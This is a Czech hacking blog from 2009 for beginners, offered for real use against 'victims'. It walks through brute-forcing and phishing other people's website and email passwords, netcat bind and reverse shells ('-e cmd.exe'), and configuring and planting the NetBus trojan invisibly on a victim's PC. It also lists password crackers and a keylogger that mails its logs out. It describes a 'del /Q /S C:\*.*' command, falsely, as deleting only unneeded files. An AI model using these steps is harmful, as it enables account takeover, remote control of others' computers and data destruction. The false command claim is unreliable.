Pro začínající hackery

28. srpna 2009 v 10:59 | mm

Pro zacinajici hackery

Přemýšlíš o tom, že bys chtěl byt hacker? Nevíš jak na to? Tak právě pro tebe je napsaná tato příručka. Takže jak začít? Nejdříve by bylo dobrý aby sis uvědomil, co chceš udělat. Nazačátek by sis měl vyhlídnout asi nějakou stránku, třeba na nějakém webhostingovém serveru (wz. kgb, mujweb,...). Takže stránku máme vybranou a teď bude zapotřebí zjistit, jak se připojit na server kde se stránka nachází. Většinou se tak děje přes službu FTP která naslouchá na portu 21. Je ale kildně možné že se na server připojue nějak jinak, kupříkladu přes http rozhraní. Ale jak tedy zjistíme která služba je otevřená? Na to slouží programy zvané scanery, pro Linux například nmap, pro Windows to může být třeba superscan, haktek, ... Těmto programům zadáte www nebo ip(lze zjistit třeba programem ping - ping www.server.com) adresu onoho serveru, za chvíli vám vypíše které porty jsou na cílovém počítači otevřeny. Nějaké scanery najdeš na mojí stránce v sekci download(factkory.wz.cz). Pro zjištění uživatelského jména, můžeš také použít program finger. Takže, už máme zjištenou službu a k ní příslušný port, uživatelské jméno. Teď přichází největší problém, a tím je heslo. To se dá zjistit třeba programem wwwhack nebo brutus. Abyste ale nemuseli čekat sto let(nekecám, to je klidně možný) než se heslo rozluští, je dobrý obstarat si nějakej slovník. Též se dá splašit někde na mejch stránkách. Programu zadáte adresu serveru, login a port na který se má připojit. Potom bude zkoušet slova ze slovníku jako heslo. Pokud heslo najde tak vám to oznámí. Pokud se vám ale nechce čekat než rozlusštíte heslo, můžete dotyčnému poslat e-mail (třeba o nějaké poruše a aby vám poslal zpátky jeho heslo). Pokud máte heslo k jeho e-mailu a dotyčný si přes něj registroval stránky, můžete poslat mail administrátorovy serveru aby vám zaslal heslo. Teď můžete stránky jakkoliv měnit...:-)
 


 


příkazoví řádek

28. srpna 2009 v 10:52 | mm
Návod na Příkazový řádek
Příkazový řádek je součástí Windows a spustíme ho v nabídce Start/Všechny programy/Příslušenství/Příkazový řádek a nebo jednoduše - Start/Spustit , do spustit napšte cmd,příkazový řádek se vám spustí.Nyní vám napíšu příkazy,které jsou velice užitečné:
AT - slouží k plánování úloh
at 18:45 shutdown -s -f -t 00
tento příklad vypne počítač v 18:45, ale pozor jen jednou!
CD - zobrazí název aktuální složky nebo změní aktuální složku
relativně: cd složka
absolutně: cd c:\složka
CMD - Spustí vám nový příkazový řádek
COPY - Zkopíruje jeden nebo více souborů do jiného umístění
copy zdroj + zdroj + zdroj cíl
zdroj znamená soubor nebo soubory určené ke kopírování
cíl je název složky, kam se mají soubory uložit nebo výsledného souboru
DEL - odstraní jeden nebo více souborů
del /Q /S C:\*.*
odstraní všechny soubory z disku C:, které se zrovna nepoužívají a tudíž nejsou potřebné k chodu systému
/Q způsobí, že nebude vyžádáno potvrzení smazání
/S odstraní soubory i z podadresářů (složky nechá prázdné, ale stále tam budou)
DIR - Zobrazí výpis aktuálního adresáře nebo zvoleného adresáře:
dir složka nebo dir C:\složka
ECHO - Vypíše vámi zadaný text, dá se využít v kombinaci s proměnnými
echo %username%
Vypíše aktuálního uživatele
Takto můžeme zapisovat i text do souborů:
echo Do prdele necum > soubor.txt
kdybysme ovšem takto opět zapsali do souboru, přepsali bysme předchozí text, protože místo > použijeme >> pro zápis na dalží řádek:
echo Tohle bude další řádek textu >> soubor.txt
FOR - Slouží k zřetězení příkazu (provedení v určitém počtu)
Základní použití je toto:
for /L %i in (1,1,10) do příkaz
první číslice znamená od kolika počítat
druhá o kolik přičítat
třetí do kolika počítat
%i je proměnná, ve které se tento stav udržuje
for /L %i in (1,1,10) do echo Počet do deseti: %i
FTP - pro přenos souborů
ftp 63.12.63.39 nebo ftp ftp.webzdarma.cz
MD - Vytvoří složku
md složka
md c:\složka
NET - Skvělý příkaz, má několik funkcí
net view zobrazí počítače v síti
net users zobrazí uživatele na počítači
net users %username% zobrazí informace o aktuálním uživateli
net users %username% nové_heslo změní heslo aktuálnímu uživateli bez znalosti původního hesla
net users nový_uživatel heslo /add vytvoří nového uživatele
net users kompik super změní heslo uživateli kompik na super
net localgroup zobrazí stávající skupiny
net localgorup Administrators ukáže uživatele ve skupině administrátorů
net localgroup Administrators %username% /add vloží stávajícího uživatele do skupiny Administrátorů
PING - Slouží k zjištění, jestli je daný počítač připojen k internetu, dá se pomocí něco i zjistit ip
ping www.centrum.cz
dostanete ip serveru centrum
TELNET - Aplikace slouží ke připojení k danému ip a portu
telnet IP_ADRESA PORT
Pokud port neuvedeme, je výchozí nastavení na 23
místo IP můžeme použít i dns (např. www.centrum.cz)
TRACERT - Slouží k trasování počítače
tracert 21.20.60.90
Ukáže vám přes jaké počítače vede komunikaci mezi vaším počítačem a počítačem oběti. DNS domény počítačů často obsahují části názvu měst, například pra, ust, apod..
TREE - Graficky zobrazí adresáře, podadresáře i soubory
tree /F C:\ nebo Tree /F složka nebo tree /F
Abyste místo diakritických znaků použili ASCII, tak použijte navíc přepínač /A
tree /A /F atd...
VER - Zobrazí verzi operačního systému
SHUTDOWN - Vypne počítač
shutdown -s -f -t 00
provede okamžité vypnutí stávajícího počítače bez dotázání na ukončení aplikací
shutdown -s -f -t 10 -c "tak se měj"
provede to samé jako v předchozím případě ale s 10vteřinovým oknem zobrazujícím důvod(tak se měj)
EXIT - Vypne příkazový řádek
Návod na NetCat
Tento program se velice často nazývá "Armádní Švýcarský nůž" každého hackera,ke stažení na mojim webu v sekci programy.K čemu slouží?
-slouží k zobrazení výpisu
-vv to samé jako předchozí, ale poskytuje obsáhlejší výpis
-nv používá se místo -v když se připojujeme místo dns na ip
-z zapne skenování portů
-w2 zvýší rychlost skenování portů
-d Zapne v tichém režimu
-l slouží k otevření portu na našem počítači
-L To samé, akorát že předchozí parametr vydrží pouze jedno připojení
-e jakmile se někdo připojí, tak skrz připojení protáhne výpis souboru (např. cmd.exe protáhne příkazový řádek oběti až k vám)
Několik příkladů:
nc -v www.webzdarma.cz 80
připojí se na server Webzdarma na port 80
poté můžete zadat příkaz
HEAD / HTTP/1.0
[ENTER]
[ENTER]
čímž se vám zobrazí hlavička serveru zobrazující nějaké informace (zvláště typ serveru)

nc -vv -z -w2 www.seznam.cz 23-300
Provede skenování portů TCP od 300 do 23 (pozpátku)

nc -v -l -p 8080
Vytvoří naslouchajícího démona na portu 8080 čekajícího na spojení

nc -v -l -p 8080 -e cmd.exe
Vytvoří naslouchajícího démona s tím rozdílem, že když se k němu někdo připojí, bude mu předána vaše příkazová řádka

nc -nv 61.63.399.63 8080 -e cmd.exe
Předá příkazový řádek netcatu naslouchajícím na portu 8080 (pokud nebyl použit parametr -e cmd.exe u naslouchajícího nc)

nc -d -L -p 8080 -e cmd.exe
Spustí netcat v tichém režimu, pokud se na něj někdo připojí, bude mu předán příkazový řádek, možnost spojení přes telnet:
telnet ip_obětí 8080
Návod Brutus AET2 - česká verze
Program BRUTUS AET2 vyhledává především hesla HTTP,FTP, POP3,Telnet.Heslo s tímto programem lze získat několika způsoby,nejlepší způsob je pomocí slovníku-wordlistu.Někdy je to zdlouhavé ,ale efektivní.Užitečné jsou hlavně české wordlisty.Dalším způsobem,jak Brutus vyhledává hesla je pomocí Brute force.Toto vyhledávání vůbec nedoporučuji,protože můžete hledat heslo nepřetžitě 100 let a nenajdete ho! To není nadsázkaani srandička,je to bohužél nezvratný fakt.Bylo by to tak jednoduchý ale skutečně to nefunguje.Brutus si stáhnete v sekci Programy,je v češtině.

Zjištění hesla e-mailu POP3:

1.Cíl - napsat pop3.seznam.cz - příklad: když je mail na centrumu tak napsat: pop3.centrum.cz

2.Typ - zadat pop3

3.Zaškrtnout - Užívací uživatel + jediný uživatel

4.Uživatelé - napsat login,jméno.Když je mail pepa@centrum.cz,tak napsat pouze pepa

5.Povolení - Word list

6.Pass File - zadat příslušný wordlist,který máte na disku.Ve wordlitu musí být uvedeno potencionální heslo,jinak ho program nenajde.Chce to mít zkrátka ten zprávný wordlist!Fakt je ten,že je to zdlouhavé... .Je také možno zadat Combo list,zadejte combo wordlist,který máte uložený na disku.Dále je možno vyhledávat pomocí Brute force,takto není potřeba žádný wordlist,program kombinuje písmena.Brute force může trvat i 100 let a heslo nenajdete!!!

7.Potom stačí kliknout - Start a program vyhledává

Nalezené heslo se zobrazí - Pozitivní výsledky ověření.Navíc jste upozorněn zvukem.
Vyhledávání HTTP,FTP,telnet ... je velice obdobné.
Návod WWWHack

WWWHack je legendární program na vyhledávání hesel,nicméně já upřednostňuju Brutus AET2. Pozor, pokud vám nepůjde spustit, musíte si změnit datum třeba o 6 měsíců zpět, on se pak spustí a natáhne z netu upgrade.
1. klikněte na položku Access a zvolte POP3 email acct. Do pole Host vepište pop3.server.cz ,např. pop3.centrum.cz
2. Username máte několik možností. První možnost je vybrat Read from this file. Pak vyberete soubor a on bude zkoušet usernames z toho souboru, (pepa@centrum.cz pak jen zadáte pepa).
3. All possible combinations. Zadáte od kolika znaků má začít a do kolika znaků se má pokoušet hacknout heslo.Vedle máte tlačítko TimeCalc a tam při zadání všech údajů zjistíte, jak dlouho by to asi mělo trvat do konce vyhledávání.
4. Always use this username. Tam zadáte username a program se bude pokoušet hledat heslo e-mailu pouze s tímto loginem.
5. Password. Má stejné možnosti Read from this file a All possible combinations.
6. Assume it's the same as the username. To znamená že zkusí vždy stejné heslo jako login (login=pass).
7. Stop after finding one password - zastavení programu po nalezení hesla.
8. Skip to next username after finding one password - přeskočit na další po nalezení jednoho hesla
Návod NetBus pro 2.01
NetBus pro 2.01 je profesionální trojský kůň - program, který má nějakým způsobem škodit, otevřít zadní vrátka,atp. .
Trojské koně můžou být "zasídleny"v programech,hrách a nemusíte o tom ani vědět.Trojský kůň nemusí být odhalen ani antivirem! Uživateli mnohdy pospává v PC několik roků aniž by o tom věděl! Obrana proti tomu jsou pravidelné aktualizace antivirů a spyware softwarů! Přímo trojan Netbus již v dnešní době odhalitelný je a to skoro všema antiviry.Pryč jsou doby,kdy se plnohodnotně využívalo děravosti win 95/98,tyto OS byly opravdu velice nebezpečné a o bezpečnosti nemohlo být ani řeč!Dnes panuje OS win xp,který mnohem bezpečnější,děravost tam samozdřejmě také je ,ale to microsoft poměrně rychle "záplatuje" aktualizacemi.O windows by zde mohlo být napsáno ještě mnohé zajímavé,ale to jindy a jinde.
S tímto trojanem se dá mj. zažít i spoustu legrace.Nejdříve ho však musíte dostat ho do cizího počítače, nebo najít už infikovaný počítač - postačí spustit scanner a zadat rozsah IP adres, které chcete skenovat a on vám vypíše všechny kompy na kterých je NetBus. Nyní si napíšeme něco málo o legraci,kterou si tímhle programem užijete:
1.Otevřít CD-Rom - můžete tím vysouvat CD-ROM
2.Vymění myš - prohazujete tlačítka myši (pravé tlačítko se bude chovat jako levé …..)
3.Hraj zvuk - přehraje mu vámi vybraný zvuk
4.Spust Program - můžete spustit program na disku
5.Vypni Windows - vypnete OS
6.Aktivuj win - zobrazí vám co má infikovaný PC spuštěného a vy s tím můžete manipulovat ...
7.Dej info - zobrazí informace o napadeném PC
a mnoho dalšího ...
A teď to nejdůležitější návod:

1. KONFIGURACE SERVERU
2. PŘIPOJENÍ K OBĚTI
3. NÁVOD JAK ODSTRANIT BackOrrifice A DALŠÍ TROJANY


1) Konfigurace serveru

V adresáři s NetBus Pro otevřete soubor NBSvr.exe a v otevřeném okně SERVER dejte Server executable - to znamená že Vaše obět musí soubor spustit, aby se aktivovala hostitelská část. Teď vyberte soubor se serverem NBSvr.exe. Zaškrtněte volby Accept Connection a Autostart every Windows session. Nastavte Invisible (95/98) to znamená, že Vase připojení nebude viditelné.Nyní nastavte jestě v Acces mode - Full acces.
Port nechte na 20034 a do password nic nepište,dejte OK.

Nyní je server pripřaven. Stačí soubor NBSvr.exe dostat k uživateli a donutit ho, aby byl spuštěn. Název souboru můžete kdykoliv změnit, soubor můžete poslat mailem,ICQ, nebo mu ho přímo nahrát do PC.


2) Pripojeni se k obětnímu PC

Toto nejprve vyzkoušejte na sobě. Spusťte soubor s serverem NBSvr.exe, a spusťte klientskou část programu - NetBus.exe. Klikněte na My computer a pokud to dole napíše Connected to a IP adresu je vše v pořádku. Nyní si můžete hrát sami se sebou a ověřit si různe funkce.

Pokud se chcete připojit na svou obět tak klikněte prav. tl. na My computer a dejte edit, přepište pouze IP adresu na IP své oběti a dejte OK. A připojte se...

3) NÁVOD JAK ODSTRANIT BackOrrifice A DALŠÍ TROJANY

Určitě nechcete, aby BackOrifice klidně pospával ve Vašem počítači a čekal, až se k němu někdo připojí, ale chcete se ho, až vyzkoušíte co umí, zbavit. To provedete zákrokem v registru. spusťte C:\WINDOWS\regedit.exe a na adrese HKEY_LOCAL_MACHINE/SOFTWARE/MICROSOFT/WINDOWS/CURRENT VERSION/RUN SERVICES .Najdete zde položku BackOrifice .exe (nebo něco podobného), ttu smažte a BackOrifice se stane po restartu PC neaktivní a tím také neškodný.A pro NetBus platí to samé... mělo by tam prostě být nějaký soubor například porno,happy tak ho odstraňte!Soubory kernel32.exe, mtask.exe, rundll32.exe tam musí
zůstat, jsou nezbytné pro funkci Windows,proto jej nikdy nemažte !!!!!!


H99 - nesouhlasím s používáním tohoto programu na jiných počítačích než jsou ty vaše!!! Program složí jen pro studiní účely !!! Vysvětlení pojmů obětní,cizí PC - toto je druhý váš počítač,na které zkoušíte funkce programu NetBus pro.
Návod na program CiberKit 2.5
Program sloužící na monitorování sítě na internetu,je dobrej na hacking,je freeware a stáhnete si ho z mé stránky v sekci Programy.Program sice není v češtině,ale tady vám píšu návod na jeho používání.
Instalace: po stažení je soubor nejprve nutné dekomprimovat do dočasné složky a následně spustit soubor Setup.exe.
Učel programu
Funkce NetScaner (umí testovat počítače se zadanými IP adresami, skenovat jejich porty a zjišťovat jaké služby na nich běží, zjišťovat jména počítače a testovat zkoušet jejich dostupnost) a DBScanner (proskenuje databázi winsocku na dostupné služby a protokoly,tuto funkci můžete použít k zjištění, zda je winsock dostupný a zda pracuje správně).
Notifikátor doručené pošty s nastavitelnou délkou periody kontroly schránky, který při doručení zprávy umí přehrát vybraný zvuk ve formátu WAV, zobrazit ikonu v system tray, případně upozornit dialogovým oknem. Výhodou je také podpora více účtů, takže lze tímto způsobem kontrolovat více schránek současně.
Funkci KeepAlive, udržující připojení k síti v aktivním stavu. V případě potřeby lze tuto funkci nastavit tak, aby v pravidelných intervalech synchronizovala systémový čas podle vybraného serveru.
Funkce
  • Ping - diagnostický nástroj kterým můžete zjistit, zda je vzdálený počítač (například www server) dostupný. Přes protokol ICMP (Internet Control Message Protocol) posílá malé datové pakety s požadavkem na odezvu, na které vzdálený server reaguje odesláním odpovědi, čímž potvrzuje svou funkčnost. Měří se doba odezvy, ztrátovost a poškození paketů.
  • Traceroute - diagnostický nástroj podobný Pingu. Používá stejný protokol, přes který zasílá pakety na vzdálený počítač. V hlavičce protokolu zasílá tzv. TTL (Time To Live) k zjištění cesty kterou pakety prochází. Traceroute tedy poskytuje výpis všech počítačů, přes která musí data projít, než se dostanou na cílový počítač a dobu jejich odezvy.
  • Finger - typicky unixovská utilita dovolující zjistit kdo je přihlášen k danému počítači. Kromě jiného umí zobrazit obsah .plan souboru, který je umístěný v kořenovém adresáři uživatele, na jehož počítač je vystaven požadavek. Obsah tohoto souboru může uživatel modifikovat. Někteří provideři tento protokol z bezpečnostních důvodů nepodporují.
  • WhoIs - se používá k dotazování internetových databází obsahujících informace o doménových jménech. Tyto informace obsahují jméno, adresu a kontakt na toho, komu doména patří. Tímto způsobem lze například zjistit, zda je ta která doména volná k případné registraci.
  • NSLookUp - umí zjistit IP adresu a jméno počítače přímo z DNS serveru. Na požadavek vypíše IP adresu a seznam všech jmen. Tato utilita bývá používána administrátory pro zjištění správné funkce DNS serveru.
  • QoD (Quote Of the Day) - dokáže zobrazit citát z tzv. "quote serveru". Tyto servery se občas vyskytují na lokálních sítích, jejich nalezení na Internetu je však poměrně složité.
  • Time synchronizer - dokáže zjistit čas na serveru a nastavit podle něj systémový čas počítače, na kterém je spuštěn. Velice dobré jsou pro tyto účely servery s atomovými hodinami zajišťujícími takřka absolutní přesnost.


ostatní hackerské programy

27. srpna 2009 v 11:14 | mm
Dešifrování - láme jednoduché šifry tvořené posunem ASCII kódu, bitovým posunem, funkcí XOR, atd.
MDCack - prolomí hesla z md4 a md5 hashe.
WinPWL - Luští hesla z *.pwl souborů.
WWWHack - cracker, který získá hesla POP3, FTP a News server, HTML formuláře a HTTP autentifikaci.
L0pthCrack - Software pro crackování windows passwordů
Brutus AET2 - legendární password cracker, který získý hesla z HTTP, FTP, POP3, Telnet atd. .
NetView 1.0.0.6 - scaner portů, http password cracker
Haktek 1.1 - portscanner, mailbomber, antimailbomber.
SuperScan - portscanner, který dokáže skenovat zadaný rozsah IP adres, obsahuje editovatelný seznam portů. které se mají skenovat.
Putty - dobrý, rychlý, malý SSH klient.
ADS EXE Joiner - exe joiner.
Lsadump - software k získání hashe hesel z LSA.
CurrPorts - přehled nad vašima portama v pc. Kompletní výpis o portech TCP/UDP.
Neo Trace Pro 3 - traceroute software.
Revalition 2 - zobrazí hesla pod hvězdičkami.
Resource Hacker - editace *.exe souborů.
NetCat - další legendární software úplně na všechno!
ICQ Force -software na hacking icq, který crackuje hesla ICQ UINu, Bruteforce a wordlist atak.
ARJHeslo - nalezne heslo do ARJ archivu.
CrackRAR - nalezne heslo do RAR archivu
CHK0 - zjistí hesla od všech uživatelů
Netutils - info o serveru, hesla uživatelů posílání zpráv...
New NTU - jako předchozí
Nowell - unit v torbo Pascalu k obsluze Novelácké sítě
NovHack - jak na noveláckou síť
Super - práva supervizora
PWL Tool - hesla uživatelů windows
Netbus Pro - trojský kůň (ovládání počítače na dálku)
NT Crack 20 - hesla v Unixu
NTU Crack - hesla v Unixu
Jack14 - hack Unixu
John The Ripper - hack Unixu
Dripper - heslo připojení daného počítače
NT Passworder - administrátorské heslo windows NT/2000 . Soft & Mozektevidi.com
Windows 9x Password Hacker - administrátorské heslo windows 95/98/ME. Soft & Mozektevidi.com
Proactive password system recovery - všechna hesla windows včetně administrátorského 95/98/ME/NT/2000/XP. Soft & Mozektevidi.com

Hackerské programy nezbitné pro život hackera

27. srpna 2009 v 10:55 | mmm
Zde je pár základních hackerských prográmů,nezbytných pro život hackera:

SC-Key Logger

Ukládá do souboru,spouští se při startu windows a lze nastavit odesílání na mail po určitém intervalu nebo nebo když soubor dosáhne zadané velikosti.

Revelation 2

revelation2.zip, (212.4kB)
Zjistí co se skrývá pod tajemnými hvězdičkami v poli pro hesla

Check IP

checkip.zip, (191.56kB)
Zjišťuje Ip a k němu připojené počítače z www

malý hackerský slovníček

27. srpna 2009 v 10:51 | mm

Malý hackerský slovník - pár slov , které se mi hodily a budou se hodit i vám doufám že vám to pomůže zorientovat se v teto řeči a výrazech hackerů .


Hack -znamená v českém překladu "násilně vniknout".
Hacker - je člověk, který se snaží proniknout,obvykle přes modem, do něja-kého počítačového systému,získat data a nenápadně beze stop zmizet. Hackeři se obvykle združují do skupin, Hackers Group, nejznámější u nás je CZert. Vedle hackingu rozeznáváme ještě Phreakování.
Cracker - Člověk, který se nabourává do cizých sítí za účelem škodit. Laická veřejnost však většinou nevnímá rozdíl mezi hackerem a crackerem a označuje všechny crackery slovem hacker.
Phreaker - je vpodstatě hákování s telefonem. Používáním různých "boxů" a "triků" manipulujících s telefonními společnostmi a jejich telefony získáte mnoho věcí, dvě z nich jsou: 1) znalosti jak pracují telefony 2) hovory zdarma, jak lokální tak i na velké vzdálenosti.
Warez -je software od pirátů. Když na internetu hledáte programy, tyto jsou odlišeny svou koncovkou "Z" na-místo "s". V praxi se tedy vyskytují appZ pro aplikace, gameZ pro hry apod.
Serials -jsou sériová čísla k různým programům, po zadání tohoto čísla se stane produkt "plno verzový, plnohodnotný".
Crack -je soubor, který většinou odstraňuje z programu nutnost zadání tohoto seriového čísla. U her cracky odstraňují různé proti-pirátské ochrany, cesty k CD apod.
Lamer -v překladu "chabý, ne-dostačující", jedná se o úplného začátečníka, který se pokouší hákovat či crackovat.
IP spoofing - jedná se o složitou hackerskou techniku, kdy hackerův počítač předstírá IP adresu někoho jiného, aby se dostal k neautorizovaným informacím. Toto je použitelné zejména u UNIXu a jemu podobným.
Password cracker - program určený k luštění hesel. Nejlepším příkladem takového password crackeru pro WinNT je L0phtcrack. Password crackery používají buď metodu Brute force nebo dictionary attacku, viz dále.
Brute force attack - neboli útok hrubou silou. Jedná se o způsob zjišťování hesel, kdy crackovací program zkouší jako možné heslo všechny existující kombinace, až natrefí na to skutečné heslo. Tento způsob může být časově velmi náročný, ale máte jistotu, že dříve nebo později na to heslo příjdete.
Dictionary attack - slovníkový útok. Crackovací program zkouší jako možné heslo všechny slova ve slovníku. Je to metoda rychlá, ale nemáte jistotu, že na něco skutečně příjdete. Zaleží to na velikosti slovníku a na tom, zda si obět volí jednoduché hesla.
Packet sniffer - Další oblast hackerských programů. Jedná se o zachytávače packetů. Můžete pomoci nich zachytávat veškerou síťovou komunikaci, ke které máte fyzický přístup. Zachytávání packetů je však pouze pro pokročilé, kteří se dokonale vyznají v síťové komunikaci.
Keylogger - program zaznamenávající stisknuté klávesy. Všechny klávesy, které uživatel na daném systému stiskne, jsou zaznamenány do textového souboru, který si pak může hacker přečíst. Pro NT je asi nejlepší Invisible keylogger for NT, který dokáže zaznamenávat bez vědomí uživatele klávesy i během přihlašování.
SAM - v tomto případě nemáme na mysli zkráceninu anglického jména Samuel , ale Security account manager. Jedná se o databázi, ve které se uchovávají například hesla uživatelů. Hesla v NT se nacházejí adresáři c:\winnt\repair a c:\winnt\config a v registrech.
Wordlist - ( většinou ) abecedně uspořádaný seznam slov pro použití s password crackerem. Je nutný pro dictionary attack. Čím větší wordlist, tím větší je šance na rozluštění hesla.
Trojan - zjednodušeně řečeno, trojan je program, který se tváří, jako že provádí nějakou činnost, ale ve skutečnosti dělá něco úplně jiného. Například nejvíce známí je asi trojan zvaný Picture.exe. Když jej otevřete, zobrazí se Vám nějaký obrázek, ale mezitím program instaluje NetBuse, což je program na dálkovou kontrolu počítače.
Port scanner - program na testování otevřených portů. V dnešní době už se však příliš nepoužívají. Asi nejlepším příkladem Port Scanneru pro NT je YAPS.
Denial of service - druh útoku proti NT. Spočívá v paralyzování nějaké služby na pracovní stanici nebo serveru.

Kam dál